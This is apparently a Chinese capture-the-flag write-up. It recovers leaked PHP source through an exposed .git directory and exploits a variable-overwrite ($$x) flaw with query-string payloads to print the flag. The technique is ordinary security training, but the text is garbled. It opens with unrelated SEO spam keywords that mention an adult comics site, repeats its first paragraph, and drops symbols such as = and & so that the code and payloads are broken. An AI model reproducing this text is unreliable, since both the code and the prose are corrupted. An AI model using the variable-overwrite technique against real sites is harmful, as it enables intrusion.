南阳东莞网站建设公司,做网站高亮,做最好的在线中文绅士本子阅读网站6,wordpress中文显示成问号打开题目 发现这么多链接#xff0c;以为要一点点去找功能上的漏洞。当你源代码#xff0c;dirsearch#xff0c;抓包等等操作之后#xff0c;发现什么都没有。所以这题又是一道源码泄露题#xff0c;上GItHack。扫描结果如下
http://63f29a80-e08b-43ae-a6d0-8e70fb02ea…打开题目 发现这么多链接以为要一点点去找功能上的漏洞。当你源代码dirsearch抓包等等操作之后发现什么都没有。所以这题又是一道源码泄露题上GItHack。扫描结果如下
http://63f29a80-e08b-43ae-a6d0-8e70fb02eaa3.node5.buuoj.cn:81/.git
主要代码在index里面
?php include flag.php; $yds dog; $is cat; $handsome yds; foreach($_POST as $x $y){ $$x $y; //$flag1 } foreach($_GET as $x $y){ $$x $$y; } foreach($_GET as $x $y){ if($_GET[flag] $x $x ! flag){ exit($handsome); } } if(!isset($_GET[flag]) !isset($_POST[flag])){ exit($yds); } if($_POST[flag] flag || $_GET[flag] flag){ exit($is); } echo the flag is: .$flag;
根据源代码需要通过get传参达到变量覆盖的目的。
?ydsflag
覆盖is变量
if($_POST[flag] flag || $_GET[flag] flag){ exit($is); }
Get或Post传入flagflag触发变量覆盖代码
foreach($_POST as $x $y){ $$x $y; //$flag1 } foreach($_GET as $x $y){ $$x $$y; }
输出?isflagflagflag 再覆盖覆盖handsome变量
handsomeflag得到$handsome$flag
?handsomeflagflaghandsome 可以得到flag
